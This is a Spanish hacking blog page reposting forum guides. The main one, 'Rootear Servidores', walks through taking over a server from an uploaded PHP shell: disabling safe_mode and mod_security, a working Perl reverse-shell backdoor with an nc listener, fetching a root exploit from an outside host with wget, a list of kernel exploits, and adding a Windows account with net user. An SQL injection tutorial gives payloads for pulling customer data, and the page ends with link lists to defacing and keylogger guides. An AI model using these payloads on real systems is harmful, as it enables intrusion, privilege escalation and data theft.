  • HKEY_CURRENT_CONFIG
  • Contiene información acerca del perfil de hardware que utiliza el equipo local cuando se inicia el sistema.

    Modificar el Registro
    Para modificar datos del Registro, un programa debe utilizar las funciones del Registro definidas en el siguiente sitio web de MSDN:

    http://msdn2.microsoft.com/es-es/library/ms724875.aspx

    Los administradores pueden modificar el Registro con el Editor del Registro (Regedit.exe o Regedt32.exe), Directiva de grupo, Directiva del sistema o archivos del Registro (.reg), o bien ejecutando scripts como los archivos de scripts de Visual Basic.

    Utilizar la interfaz de usuario de Windows
    Se recomienda que utilice la interfaz de usuario de Windows para cambiar la configuración del sistema, en lugar de modificar el Registro manualmente. Sin embargo, modificar el Registro puede ser a veces el método mejor para resolver un problema del producto. Si el problema está documentado en Microsoft Knowledge Base, dispondrá de un artículo con instrucciones paso a paso para modificar el Registro en relación con ese problema. Recomendamos que siga exactamente esas instrucciones.
    Utilizar el Editor del Registro
    Advertencia: pueden producirse problemas graves si modifica incorrectamente el Registro mediante el Editor del Registro o con cualquier otro método. Estos problemas pueden requerir que reinstale el sistema operativo. Microsoft no puede garantizar la solución de esos problemas. Modifique el Registro bajo su responsabilidad.
    Puede utilizar el Editor del Registro para hacer lo siguiente:

  • Buscar un subárbol, clave, subclave o valor
  • Agregar una subclave o un valor
  • Cambiar un valor
  • Eliminar una subclave o un valor
  • Cambiar el nombre de una subclave o un valor
  • El área de navegación del Editor del Registro muestra carpetas. Cada carpeta representa una clave predeterminada del equipo local. Cuando se obtiene acceso al Registro de un equipo remoto, sólo aparecen dos claves predefinidas: HKEY_USERS y HKEY_LOCAL_MACHINE.
    Utilizar Directiva de grupo
    Microsoft Management Console (MMC) hospeda herramientas administrativas que puede utilizar para administrar redes, equipos, servicios y otros componentes del sistema. El complemento Directiva de grupo de MMC permite a los administradores definir la configuración de la directiva aplicada a equipos o a usuarios. Puede implementar Directiva de grupo en equipos locales utilizando el complemento de directiva de grupo local de MMC, Gpedit.msc. Puede implementar la directiva de grupo en Active Directory utilizando el complemento Usuarios y equipos de Active Directory de MMC. Para obtener más información acerca de cómo utilizar la directiva de grupo, vea los temas de Ayuda del complemento de directivas de grupo de MMC apropiado.
    Utilizar un archivo de entradas del Registro (.reg)
    Cree un archivo de entradas del Registro (.reg) que contenga los cambios del Registro y ejecute el archivo .reg en el equipo en el que desee realizar los cambios. Puede ejecutar el archivo .reg manualmente o mediante un script de inicio de sesión. Para obtener más información, haga clic en el número de artículo siguiente para verlo en Microsoft Knowledge Base:
    310516 Cómo agregar, modificar o eliminar subclaves y valores del Registro mediante un archivo de entradas de registro (.reg)


    FUENTE:http://www.newbie.cl/nb/2009/02/08/registro-de-windows/

    Rootear Servidores

    0 comentarios

    Les traigo este paper hecho por vengador de las sombras , muy bueno espero lo disfruten

    Rootear Servidores


    Por Vengador de las Sombras (F.O.S TEAM)


    0X00 INDICE


    0x01 Introducción
    0x02 Habilitar funciones (bypassing)
    0x02~01 Safe_mode
    0x02~02 Mod_security
    0x03 Shell inversa
    0x04 Rootear el servidor
    0x04~01 Servidores con Linux
    0x04~02 Servidores con Win32
    0x05 Despedida y Agradecimiento s



    0X01 INTRODUCCIÓN



    El tema de "tengo una shell en el servidor, ahora que hago" seguro que nos suena de haberlo leido reitaradas veces en muchos foros. Y es que esta es una de las dudas existenciales cuando empiezas en este mundillo... ¿Qué hacer con tu shell?.

    Pues para las personas que tienen esta duda, va dirigido esta guía. La idea original de crear dicha guía me la dió hace ya tiempo Lëssiëm. En aquel momento le expliqué de una forma "muy breve" el como rootear un servidor... pero en aquella ocasión se lo expliqué todo color de rosa, es decir sin ningun tipo de complicación. La idea de la guia se fue dejando de lado... hasta que antes de irme a la Universidad decidi crearla.

    0X02 HABILITAR FUNCIONES (BYPASSING)



    El primer problema con el que solemos encontrarnos a la hora de "juankear" un servidor, suele ser el que tenemos ciertas funciones deshabilitadas por culpa del "Safe_Mode", o tenemos algún problema con el Mod_Security. Cualesquiera que sea el caso del que nos dé problemas, en este capítulo hablaremos de como saltar, de como "bypassear" estas restricciones que nos encontramos.

    Cuando tenemos una shell subida a un servidor, usualmente nuestro primer objetivo es el lograr habilitar aquellas funciones que vamos a necesitar, para poder desenvolvernos de la forma más sencilla por todo el servidor. A continuación pasamos a explicar detalladamente distintos bypassing.

    0X02~01 SAFE_MODE



    El Safe_Mode o Modo Seguro, es una configuración que se suele seguir mucho en los servidores que suelen ser de hospedaje, es decir, en aquellos que cada usuario tiene un /home/ diferente donde se alojan, teniendo el servidor así diferentes /home/, uno por cada usuario. Para evitar el que un usuario pueda interferir de algún modo en el normal funcionamiento de otro, estos servidores suelen adoptar una configuración de Modo Seguro.


    Esta configuración lo que hace es inhabilitar ciertas funciones PHP que puedan tacharse como "peligrosas", tales como funciones de ejecución (Eval, System, exec...) y algunas otras como rename, copy, etc. Realmente no es que deshabiliten la totalidad de éstas funciones, sino que bloquean su uso únicamente al dueño del fichero.

    Como nos habremos dado cuenta ya, Safe_Mode representa una barrera que debemos de saltar para poder "hacer algo" dentro del servidor. Para bypassear el Safe_Mode, existen diversas formas.


    La primera de todas es usando algún exploit que vulnere la versión PHP que está corriendo el servidor. Normalmente deben de ejecutar el código del exploit en la shell. ¿Cómo hacemos esto?. Si alguna vez han manejado una R57 o una C99, habrán observado que existe un apartado donde pone "Run PHP Code" o similar. Deben de colocar ahí el código del exploit y lo ejecutan.




    Una segunda forma para realizar un bypassing es el subir al mismo path donde se encuentra nuestra shell un archivo de configuración php.ini. Esto se hace así porque el safe_mode se configura como ON en la configuración de PHP. Entonces lo que vamos a hacer, es colocar un archivo de configuración dentro del mismo path en el que tenemos nuestra shell para deshabilitar en este path el Safe_Mode. EL source del .ini es el siguiente:



    [PHP]
    register_globals = On
    engine = On
    safe_mode = Off
    safe_mode_exec_dir = On
    safe_mode_include_dir =On


    Pues ya sabemos cómo bypassear el safe_mode para poder movernos con soltura dentro del servidor.

    0X02~02 MOD_SECURITY



    Otra medida de seguridad que en muchas ocasiones necesitamos bypassear es el Mod_Security de Apache. Mod_Security es muy molesto para trabajar en el servidor... así que tendremos que bypassearlo editando el fichero .htaccess. Deberemos de añadir al fichero .htaccess



    SecFilterEngine Off
    SecFilterScanPOST Off
    SecFilterCheckURLEncoding Off
    SecFilterCheckUnicodeEncoding Off
    &/IfModule>



    Con esto y el bypass de Safe_Mode tendríamos la mitad del asunto hecho

    0X03 SHELL INVERSA



    El caso es que usar la shell en PHP para empezar está bien, pero cuando ya has conseguido realizar los bypass y lo que buscas es manejarte y tratar de rootear el servidor, siempre es mejor tener una shell sobre la que ejecutar instrucciones.

    Como bien sabemos ya por NetCat, la shell inversa es la mejor forma de tener el control del servidor. Mayormente es preferible una inversa a una directa porque el firewall, en principio, casi siempre permite conexiones salientes, pero no entrantes.


    Entonces nuestro objetivo será codear alguna aplicación que nos dé una shell inversa en el puerto que elijamos. Yo normalmente codeo los backdoors en PERL, ya que el uso de socket es muy sencillo. Por otra parte, existen otras personas que prefieren usar Backdoors codeadas por terceros, como la Datacha0s, o la BackConnect del D.O.M. Personalmente siempre apoyo el "codeate tú mismo tus herramientas" para depender menos de terceros. Así que aqui os dejo un PoC :



    print "[+]Connecting to $host ...";
    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
    || die "[-] Cannot Resolve $host";
    connect(SOCKET, sockaddr_in($port, inet_aton($host)))
    || die "[-] Cannot Connect to $host";

    print "\n[+] Connected!";

    open(STDIN, ">&SOCKET");
    open(STDOUT,">&SOCKET");
    open(STDERR,">&SOCKET");
    $ejecutor = "/bin/bash";
    system($ejecutor);


    Esa es una pequeña idea, estudiad Perl para poder implementar esta idea. El caso es que con eso lanzaríamos un socket al host y puerto que hayamos puesto. Aqui les dejo la BackFoS (el backdoor que codee para el FOS TEAM) en su version 0.2. Actualmente estamos trabajando con la 0.3 (le he añadido unos pocos errores anti-kiddies):


    #!/usr/bin/perl

    ########### BackFoS v0.2 - By FoS TeaM - [priv8] ##########
    # #
    # BackFoS is a Backdoor in PERL for all Servers #
    # c0dex by Vengador de las Sombras #
    # #
    # USAGE: Perl BackFoS.pl #
    # You need have listen nc, cryptcar, putty or other #
    # program on to connect with the backdoor #
    # #
    #=========================================================#
    # #
    # Gr3tz to: Lutscher, WaesWaes, CHR0N05, Keynet, Fr34k, #
    # Lëssiëm Tárálom, Phonix & ArgeniversoHack & #RE members #
    # Especial Thanx To Plaga, for the help =) #
    # #
    #################### (c)FoS TeaM 2008 #####################

    #use IO::Socket;

    print q(

    =================================================
    BackFoS.pl c0dex by FoS TeaM
    =================================================
    );
    $ARGC = @ARGV;
    if ($ARGC != 5){
    print "\nUsage: BackFoS.pl
    exit(0);
    }

    $host = $ARGV[0];
    $port = $ARGV[1];
    $OS = $ARGV[2];
    use Socket;

    print "[+]Connecting to $host ...";
    socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'))
    || die "[-] Cannot Resolve $host";
    connect(SOCKET, sockaddr_in($port, inet_aton($host)))
    || die "[-] Cannot Connect to $host";

    print "\n[+] Connected!";

    open(STDIN, ">&SOCKET");
    open(STDOUT,">&SOCKET");
    open(STDERR,">&SOCKET");

    print "\n .::BackFoS v0.2 - FoS TeaM - [Priv8]\n";
    if ($OS == "-l"){
    $ejecutor = "/bin/bash";
    system($ejecutor);
    }

    if ($OS == "-w"){
    $ejecutor = "cmd";
    sistem($ejecutor);
    }


    Antes de mandar la shell, debemos de ejecutar en nuestra propia shell lo siguiente:



    nc -lvvp 90


    Podemos usar NetCat, o cualquier otro programa que sirva para hacer negociaciones TCP/IP. El caso es que así dejamos a la escucha netcat para que reciba la shell. Desde la shell .php que tenemos en el servidor ejecutamos lo siguiente:



    perl


    et voilá ya podemos manejarnos dentro de la shell del servidor. Normalmente desde esta shell tendremos más flexibilidad que con la shell .php.


    0X04 ROOTEAR EL SERVIDOR



    Ya hemos llegado al apartado crucial de este paper. Cuando hablamos de rootear un servidor, a lo que nos referimos es a conseguir ser root del servidor, es decir, poder hacer lo que se nos antoje dentro del servidor. Aqui vamos a diferenciar entre servidores que corren con Linux y los que corren con Win32



    0X04~01 SERVIDORES CON LINUX



    Cuando rooteamos un servidor que corre con el sistema operativo Linux, lo que haremos será atacar al kernel (en caso de que sea una versión vulnerable) para que elevemos privilegios.

    En este caso partimos de la base de que ya estamos controlando una shell inversa procedente del servidor. Lo primero que deberemos de hacer será comprobar si la versión del kernel es vulnerable. Para ello deberemo sde ejecutar la instruccion uname -r. Aqui les dejo un listado de kernels y posibles rootexploits que los vulneran:

    2.4.17=> "newlocal kmod uselib24",
    2.4.18=> "brk brk2 newlocal kmod",
    2.4.19=> "brk brk2 newlocal kmod",
    2.4.20=> "ptrace kmod ptrace-kmod brk brk2",
    2.4.21=> "brk brk2 ptrace ptrace-kmod",
    2.4.22=> "brk brk2 ptrace ptrace-kmod",
    2.4.22-10=> "loginx",
    2.4.23=> "mremap_pte",
    2.4.24=> "mremap_pte uselib24",
    2.4.25-1=> "uselib24",
    2.4.27=> "uselib24",
    2.6.2=> "mremap_pte krad h00lyshit",
    2.6.5=> "krad krad2 h00lyshit",
    2.6.6=> "krad krad2 h00lyshit",
    2.6.7=> "krad krad2 h00lyshit",
    2.6.8=> "krad krad2 h00lyshit",
    2.6.8-5=> "krad2 h00lyshit",
    2.6.9=> "krad krad2 h00lyshit",
    2.6.9-34=> "r00t h00lyshit",


    o hice una tool para el team que se encargaba precisamente de eso, de mostrar los posibles rootexploit a partir de ese listad (creas una matriz asociativa, dejando las Keys como las versiones y los Values con los rootexploits, despues lo que haces es ejecutar uname -r y creas un patron de búsqueda que compruebe si en el output aparece alguna version de kernel que tengamos en el hash).

    Bien desde la shell remota lo que haremos será movernos hasta un directorio donde podamos ejecutar archivos. Normalmente se suele recurrir a /tmp o se hace un find . -type d -perm (los que necesiemos buscar)

    Bueno, si ya estamso en el directorio, ahora debemos de descargar nuestro rootexploit al servidor usando el comando wget (wget http://mihost.com/del/exploit). Tras haber descargado nuestro rootexploit, deberemos de darle permisos de ejecuccion (777) usando el comando chmod:

    Código:

    chmod 777 rootexploit


    Y ya solo nos quedaría ejecutarlo con ./rootexploit. Si todo ha salido bien, deberíamos de ser root ya.

    0X04~02 SERVIDORES CON WIN32



    Los más puristas llaman a esto "Semi-rootear" el servidor... pero bueno. Yo aprendí siguiendo un paper que publicó You_kn0w. La idea es crear un usuario en el servidor con permisos de administrador a través de los comandos net. Es por ello que es necesario tener el safe_mode off, para poder ejecutar comandos.

    El "ataque" se inicia desde la shell que tengamos en el servidor. Allí lo que hacemos es ejecutar las siguientes instrucciones:

    Código:

    net user FoS 123456 /add


    Para aquellos que sepan algo de batch, sabrán que lo que hemos hecho ha sido crear un usuario llamado FoS cuya password es 123456. Bien ahora nos vamos a inicio -> ejecutar y escribimos mstsc.exe

    Se nos abrirá una ventania. Ahí vamos a opciones y rellenamos los campos, a excepción de Equipo. En ese campo deberemos de poner la IP del servidor donde nosotros nos habíamos creado el usuario. Podemos o bien hacer ping al servidor o bien hacer desde la shell ipconfig y sacar la IP.

    0X05 DESPEDIDA Y AGRADECIMIENTOS




    Bien, creo que al final este paper ha quedado como una buena introducción a las newbies que empiezan en este mundo. Por otra parte creo que podría expandirse un poco más... pero bueno eso para otra ocasión. Espero les haya sido de utilidad.


    Gr3tz to: FoS TeaM (Chipbios & Mace Windu), Askata, Chr0n05, Lëssiëm, Lutscher, Keynet, Fr34k, N.O.X. Tambien agradecer a mi betatester S e t H y a mi gran colega Plaga.

    FUENTE:http://0verl0ad.blogspot.com/search/label/Rootear

    Inyeccion SQL desde 0

    1 comentarios

    Me encontre este tutorial muy bueno espero que lo disfruten:

    Wenas.
    aqui explicare a iniciarse en las inyecciones SQL a través de variables de tipo GET. La idea me ha surgido al empezar a introducir a Plaga al divertido mundo de las vulnerabilidades.

    Tras leerse y aprender lo que se va a exponer en este pequeño tutorial/manual podreis manejaros un poco más en el uso de las SQL Injection, una vulnerabilidad que cada día se extiende más. Nosotros nos vamos a basar en usar el método de ir probando y obteniendo errores, de los cuales sacaremos información jugosa.

    Primeros pasos:sacando la tabla

    Bien, para empezar necesitamos encontrar alguna web que potencialmente pudiera (no lo sabemos todavía) tener algún script del tipo “noticias.asp?ID=”, “artículos.php?view=” vulnerable.
    ———————————————————————————————–
    Consejo:es recomendable tener un block de notas abierto para ir escribiendo los resultados de las inyecciones, ya que a la hora de construir PoC o trabajar con la info extraida, viene bastante bien tener todo organizado.
    ————————————————————————————————

    La inyección la introducimos en variables de tipo GET. ¿Qué son estas variables? Resumiendo muy mucho,,podemos decir que son aquellas variables que se introducen a través de la URL.
    Vamos a utilizar un ejemplo imaginario. Estamos viendo una web, y nos encontramos con un link tipo “www.paginafals a.com/index.asp?profile=47″. Para comprobar si es vulnerable comenzamos por poner’. Con ‘ indicamos la finalización de una sentencia SQL. Nuestro código malicioso será ‘ having 1=1–. El “–” sirve para que sean ignoradas todas las sentecias que venga detrás, equivale al “#” en perl o al //, /*, etc de otros lenguajes. En el caso del ejemplo imaginario, nos debería de “vomitar” la web un error del estilo de:

    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′

    [Microsoft][ODBC SQL Server Driver][SQL Server]La columna ‘Datos.Id’ de la lista de selección no es válida, porque no está contenida en una función de agregado y no hay cláusula GROUP BY.

    D:\WADHOO01\T15\../sistema/include0.asp, línea 4

    Bien no os alarmais, de aquí lo único que nos interesa es Datos.Id. “Datos” es el nombre de la tabla en la que estamos operando, y “Id” es el nombre del campo. Sería aconsejable hechar un pequeño vistazo a algún manual de manejo de DBs para comprender su estructura. En estos campos será donde se encuentre contenida la información que maneja la DB de la web que estamos “atacando”. Ahora imprescindible agarrar el notepad y ponen “NOMBRE TABLA: Datos” y despues en otra línea “Campos: 1º Id”.

    Le ponesmos “1º” porque los campos se encuentran ordenados dentro de la DB y éste orden es imprescindible a la hora de construir las sentencias.

    Sacando los campos de la tabla

    Ahora si recopilamos la información que deberíamos de tener en nuestro notepad, podemos ver que ya tenemos el nombre de la tabla (Datos) y el primero campo (Id). Pero bien, ahora necesitamos sacar el resto de campos que componen la tabla Datos. ¿Para qué? Pues para conocer la estructura sobre la que estamos trabajando, ya que posteriores inyecciones necesitarán basarse en la info que vayamos obteniendo, a parte, el nombre de los campos nos darán una pista sobre donde puede haber la información que andamos buscando (una tabla que se llame passwords, tiene un altísimo, de un 98%, de que contenga passwords, y si encima hay otra columna con users, el trabajo lo tienes servido).

    Para poder ir sacando los campos en orden, nos valdremos de la siguiente inyección:

    ‘ GROUP BY Datos.Id having 1=1–

    ¿y qué es lo que nos vomita la web?

    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′

    [Microsoft][ODBC SQL Server Driver][SQL Server]La columna ‘Datos.clientes’ de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.

    D:\WADHOO01\T15\../sistema/include0.asp, línea 4

    Bien, ya tenemos el 2º campo: “clientes”. Pero, ¿como seguimos extrayendo información? Añadiendo mediante una “,” el nuevo campo descubierto, así la inyección nos dará el siguiente campo, quedando algo así:

    ‘ GROUP BY Datos.Id,clientes having 1=1–

    Y ahora nos devuelve la web:

    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′

    [Microsoft][ODBC SQL Server Driver][SQL Server]La columna ‘Datos.correo’ de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.

    D:\WADHOO01\T15\../sistema/include0.asp, línea 4

    Bien, lo mismo de antes, pero con el tercer campo, “correo”. No hace falta deciros que toda esta info de los campos debe de ser guardada en nuestro notepad.

    Ahora, tenemos que ir poniendo la misma inyección, únicamente con la adición de una nueva “,” y del campo qeu descubrimos hasta que nos salga algo tipo:

    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′

    [Microsoft][ODBC SQL Server Driver][SQL Server]El prefijo de columna ‘Datos’ no coincide con un nombre de tabla o con un alias usado en la consulta.

    D:\WADHOO01\T15\../sistema/include0.asp, línea 24

    Esto es el indicativo de que ya no hay más campos, por lo tanto ya sabemos que: la tabla se llama “Datos”, tiene tres campos que son Id, clientes y correo. En nuestro caso, como ya les comenté al inicio del tutorial, vamos a trabajar con los campos clientes y correo.

    Mostrando el contenido de los campos

    Ya tenemos los campos que nos hacían falta y que contiene la informacion que andabamos buscando, pero ahora nos hace falta “ver” esa información. Ahora es cuando entra en juego el uso de sentencias ‘ UNION SELECT. Para poder usarlo, necesitaremos facilitar el mismo número de campos que tiene la tabla, para ello usaremos “1″.

    Lo que haremos será primero encontrar un valor en el campo “clientes” y después encontrar su correo correspondient e. Para ello nos deberemos de basar en la ingeriniería social, yo por ejemplo voy a buscar el primer nombre que empiece por J. Entonces monto la inyección de esta forma:

    ‘ UNION SELECT MIN(Campo),1,1,1/* tantos “1″ como campos */ FROM Tabla WHERE campo > ‘j’–

    Con esto nos devolverá el primer nombre que empiece por “j”. El error que nos devuelve el contenido es devido a que la variable está cofigurada como de tipo “varchar” y al ser una letra con lo que operamos, la función “min()” sufre un error de sintaxis. Mi inyeccion es esta:

    ‘ UNION SELECT MIN(clientes),1,1 FROM Datos WHERE cleintes > ‘j’–

    Y me devuelve la web:

    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′

    [Microsoft] [ODBC SQL Server Driver] [SQL Server]Error de Sintaxis al convertir el valor varchar “Juanito” a una columna de datos tipo int.

    D:\WADHOO01\T15\../sistema/include0.asp, línea 24

    JOOJOOJOJO hay un cliente que se llama Juanito jejejeje. Veamos su correo:

    ‘ UNION SELECT MIN(correo),1,1 FROM Datos WHERE clientes = ‘Juanito’–

    Y el resultado es…

    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′

    [Microsoft] [ODBC SQL Server Driver] [SQL Server]Error de Sintaxis al convertir el valor varchar ” he@ArgeniversoHAck.com“>Juanito_de_noc he@ArgeniversoHAck.com” a una columna de datos tipo int.

    D:\WADHOO01\T15\../sistema/include0.asp, línea 24

    Pues ya tenemos nuestros datos y el cliente “juanito” tiene un correo que es he@ArgeniversoHAck.com“>Juanito_de_noc he@ArgeniversoHAck.com. Ahora transporatar estos conocimientos a un login, con user y password.

    Bueno espero k este tuto os alla serbido de algo.

    Salu2

    P.D.= tutotorial creado por Vengador De Las Sombras (Todo no, algo lo e puesto yo xD)

    http://www.jorgeisaac.com/?p=243

    fuentE:http://darknesshackteam.co.cc/foro/index.php?topic=479.0

    documentacion 1-ingles

    0 comentarios
    http://forum.darkc0de.com/index.php?action=vthread&forum=19&topic=3778
    http://forum.darkc0de.com/index.php?action=vthread&forum=19&topic=8915
    http://forum.darkc0de.com/index.php?action=vthread&forum=19&topic=6004
    http://nazrek.org/?p=482
    http://multimediaforensics.com/mobile-forensics-world-2009-t487.html-sid=502f083c2fcd50878ad3e88fc2344ed5#p1321
    http://www.experts-exchange.com/Security/Encryption/Q_22563579.html
    http://foro.elhacker.net/nivel_web/xst_cross_site_tracing-t206967.0.html;msg984184
    https://www.underground.org.mx/index.php?topic=14833.0;wap
    http://www.netsearch-ezine.org/ezines/ns008/ns8-0x0b.txt
    https://www.underground.org.mx/index.php?topic=19208.0;wap
    http://www.secuobs.com/plugs/11213.shtml
    http://en.wikipedia.org/wiki/Cross-site_tracing
    http://searchsoftwarequality.techtarget.com/sDefinition/0,,sid92_gci1188707,00.html
    http://www.owasp.org/index.php/Cross_Site_Tracing
    http://www.codinghorror.com/blog/archives/001175.html
    http://sigt.net/archivo/y-mas-fallos-xsrf-xss-para-wordpress.xhtml
    http://zer0z0org.blogspot.com/2008/08/metroflog-csrf-xsrf-cross-site-request.html
    http://www.owasp.org/index.php/LDAP_injection
    http://www.owasp.org/index.php/Testing_for_SSI_Injection_(OWASP-DV-009)
    http://www.netsearch-ezine.org/ezines/ns008/ns8-0x0b.txt
    http://www.kernelnet.com/content/view/304/2/
    http://foros.hackerss.com/t8411/ldap-injection-y-blind-ldap-injection
    http://elladodelmal.blogspot.com/2007/10/ldap-injection-blind-ldap-injection.html
    http://elladodelmal.blogspot.com/2008/04/jugando-con-ldap-iii-de-iii.html
    http://www.netsearch-ezine.org/ezines/ns008/ns8-0x08.txt
    http://www.jorgeisaac.com/?p=243
    http://argentinasec.blogspot.com/2008/05/inyecciones-sql-bsico-en-cdigos-php_29.html
    http://remoteexecution.com/foro/index.php?topic=2204.0
    http://foro.elhacker.net/nivel_web/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.0.html
    http://www.foroswebgratis.com/tema-defacing-91570-729140.htm
    http://forum.darkc0de.com/index.php?action=vthread&forum=19&topic=4673

    ------------------------------------------------------------------------------

    http://www.sahw.com/wp/archivos/2008/12/02/analisis-forense-de-memoria-en-sistemas-windows/
    http://moyix.blogspot.com/2008/09/window-messages-as-forensic-resource.html
    http://ws.hackaholic.org/artigos/WSUpSigF_Shell.txt
    http://www.insidepro.com/eng/saminside.shtml
    http://foro.el-hacker.com/index.php?topic=139730.0
    http://www.lockpickingspain.com/
    http://hack0wn.com/forum/index.php?board=22.0
    http://www.spanish-hackers.com/
    http://bright-shadows.net/
    http://forensiczone.blogspot.com/2009/01/using-volatility-1.html
    http://blog.didierstevens.com/2006/09/18/a-windows-live-cd-plugin-for-my-userassist-utility/
    http://blog.didierstevens.com/programs/userassist/
    http://forensiczone.blogspot.com/2007/12/user-assist-data-in-ram-dump.html
    http://conexioninversa.blogspot.com/2009/02/forensics-con-volatility.html
    http://vidainformatico.blogspot.com/2005/11/como-hackear-hotmailenvenenamiento-arp.html
    http://conexioninversa.blogspot.com/2008/12/escuela-de-reciclaje.html
    http://conexioninversa.blogspot.com/2008/12/perdidos-en-el-espacio.html
    http://www.lifedork.com/sql-injection-google-scanner.html
    http://r00tsecurity.org/forums/index.php?showtopic=7627
    http://forum.darkc0de.com/index.php?action=vtopic&forum=19&sortBy=0&page=8
    http://www.eylion.com/web/content/view/15/2/

    borrador- no mirar nada interezante :D

    1 comentarios
    http://blog.ismaelvalenzuela.com/wp-content/uploads/2008/04/

    http://seguridadyredes.nireblog.com/post/2008/01/11/analizando-la-red-con-windump-tcpdump-i-parte

    http://www.cesga.es/component/option,com_docman/task,cat_view/gid,14/Itemid,13/lang,gl/

    http://www.slideshare.net/hugo.gonzalez/comsi

    http://www.scribd.com/doc/4024238/SEGURIDAD-EN-LA-RED-Y-ANALISIS-FORENSE

    http://www.securitytube.net/Reverse-Engineering-101-(-Using-a-Hex-Editor-to-Find-Passwords-)-video.aspx

    http://www.whatsmypass.com/?p=415

    http://sa-medex.blogspot.com/2009/01/gmail-goes-offlineand-how-to-parse-it.html

    http://unixsadm.blogspot.com/2007/11/exploiting-md5-and-other-hashing.html

    http://www.jacksecurity.com/publicacion.php?idpub=74

    http://forensiczone.blogspot.com/2008/05/ram-enscript-version-10.html

    http://vlan7.blogspot.com/2009/02/user-profile-deletion-utility.html

    http://support.microsoft.com/kb/924732

    http://angelb.wordpress.com/2008/06/02/how-to-create-an-excel-spreadsheet-and-import-data-from-a-text-file-brief-tutorial/

    http://foro.eduhack.es/hacking-avanzado/ataque-maninthemiddle-t389.0.html

    http://foro.eduhack.es/hacking-avanzado/tutorial-ataques-dos-a-base-de-pings-t2719.0.html

    http://foro.eduhack.es/bugs-y-exploits/tutorial-accediendo-como-administrador-a-un-foro-phpbb-203-e-inferiores-t2721.0.html

    http://www.jorgeisaac.com/?p=243

    http://johnny.ihackstuff.com/ghdb.php

    http://root-sh3ll.66ghz.com/foro/index.php?topic=277.0

    http://root-sh3ll.66ghz.com/foro/index.php?topic=298.0

    http://foro.elhacker.net/tutoriales_documentacion/tutorial_de_inyeccion_sql_sql_injection-t98448.0.html

    http://www.go4expert.com/forums/printthread.php?t=11842

    http://foro.elhacker.net/hacking_basico/tutorial_conseguir_contrasenas_a_traves_de_keylogger-t180815.0.html

    http://foros.hackerss.com/t8521/crear-rfi-en-una-inyeccion-sql-mysql

    http://foro.el-hacker.com/index.php/topic,159426.0.html

    http://www.megaunder.com.ar/bugs-exploits-injection-including-y-xss/5576-xss-y-el-bypassing-de-filtros.html

    http://www.set-ezine.org/index.php?art=9

    http://www.foroswebgratis.com/mensaje-defacing-91570-729140-1-2401466.htm

    http://root-sh3ll.66ghz.com/foro/index.php?topic=159.0

    http://root-sh3ll.66ghz.com/foro/index.php?board=13.0

    http://foro.elhacker.net/nivel_web/taller_de_introduccion_a_los_bugs_a_nivel_web-t173509.0.html;msg821888

    http://ciscofunda.blogspot.com/2009/02/certified-ethical-hacker-v6-training.html

    http://www.intercambiosvirtuales.org/cursos-multimedia/career-academy-certified-ethical-hacker

    http://www.aptechitevn.com/forums/showthread.php?p=11342

    http://forum.megasharesvn.com/showthread.php?t=85937

    Links de textos interezantes

    1 comentarios
    Son links muy buenos , muy documentados y sobre todo de mis gustos , asi que espero que tambien les guste saludos :D

    http://root-sh3ll.66ghz.com/foro/index.php?topic=153.0 --rfi

    http://root-sh3ll.66ghz.com/foro/index.php?topic=159.0 --xss

    http://his.sourceforge.net/proy_his/sotm/scan24/tagetora/

    http://help.adobe.com/es_ES/AIR/1.1/devappsflash/WS5b3ccc516d4fbf351e63e3d118666ade46-7d53.html

    http://www.sinfocol.org/2008/12/solucion-reto-2-esteganalisis/

    http://nauscopio.nireblog.com/post/2008/01/17/analisis-de-capturas-trafico-red-interpretacion-datagrama-ip-i

    http://inform.pucp.edu.pe/~inf232/Semestre-2007-1/Laboratorio-2/index.htm

    http://www.elguille.info/Net/dotnet/extraer_imagen_de_fichero_PBP.aspx

    http://www.carballude.es/Blog/?cat=82

    http://www.geocities.com/axelnet_2000/Cracking.html

    http://usuarios.lycos.es/sisar/yangosoft/crack/sol/solucioncrackme1.htm

    http://foro.elhacker.net/ingenieria_inversa/os_dejo_un_crackme_mi_primer_crackme-t131302.5.html;wap=

    http://foro.elhacker.net/ingenieria_inversa/tutorial_crackme1_de_frankener1986_por_karmany-t180728.0.html

    http://www.ordendeltemple.com/Logistica/LogisticaOrdenTemple.htm --la roca criptografia

    http://www.all-internet-security.com/encryption/ --101 programas para encriptar y desencriptar

    http://foros.hackerss.com/index.php?showtopic=3288 --tecnicas de desfacing

    http://www.terminalhacker.es/smf/index.php/topic,3491.0.html -->http headers inyection

    http://forum.kaspersky.com/index.php?showtopic=75048

    http://www.soulblack.com.ar/papers.htm

    http://www.tuts4you.com/download.php?0.list.45.50.download_name.ASC --inge invers a

    http://biblioweb.sindominio.net/telematica/solitario.html --solitario cifrado

    http://www.hackthissite.org/pages/articles/article.php

    http://www.lookuptables.com/ --html table codes

    http://crackx.webcindario.com/read.php?art=24 --criptoanalisis frecuencias en espanol

    http://blog.s21sec.com/search/label/Vulnerabilidades --muy buen blog

    http://foro.elhacker.net/nivel_web/jugando_con_xss-t238673.0.html --muy completo sobre xss hecho por draxgon

    http://foros.hackerss.com/t8487/xss-introduccion --mas xss

    http://foros.hackerss.com/t9596/wessideng-rompiendo-wep-en-1-minuto --rompiendo wep en 1 minuto

    http://blog.48bits.com/?p=258 --inge inversa, crack

    http://www.foroswebgratis.com/mensaje-defacing-91570-729140-1-2401466.htm --desfacing

    http://www.informaticanova.com/NOTICIAS-SEGURIDAD-INFORMATICA/tutorial-absinthe-blind-sql-inyection-inyecciones-ciegas-sql.html --jugando con sql

    http://steghide.sourceforge.net/documentation/manpage_es.php --steghide manual esp

    http://futur3.com/?p=100 --retos

    http://foros.hackerss.com/t8485/cookies-poisoning --cookies poisoning

    http://foro.elhacker.net/nivel_web/taller_de_introduccion_a_los_bugs_a_nivel_web-t173509.0.html;msg821888 --taller para iniciacion en bugs web

    http://www.set-ezine.org/index.php?art=9 -set ezine

    http://www.evilc0der.com/ -evil coder

    http://hackstore.net/listado39.html -hackstore

